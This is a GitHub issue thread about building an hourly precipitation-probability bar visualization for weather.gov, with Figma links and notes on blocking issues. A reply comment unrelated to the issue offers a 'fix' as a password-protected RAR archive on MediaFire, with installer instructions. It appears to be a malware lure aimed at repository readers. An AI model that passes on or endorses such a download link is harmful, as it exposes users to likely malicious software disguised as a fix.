### ISSUE TITLE
Visualization: PoP, hourly, bar

### ISSUE THREAD

**Issue by colinmurphy01** [weather-gov/weather.gov#1633]
[Figma documentation ](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=11028-255552&m=dev&t=yrI9IMUri5KRaKev-1)

[In Context](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=10757-238038&t=yrI9IMUri5KRaKev-4) 

Considerations:
- Blocked by #789 
- Implement within Hourly Details expansion for now, while we wait on #1616

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
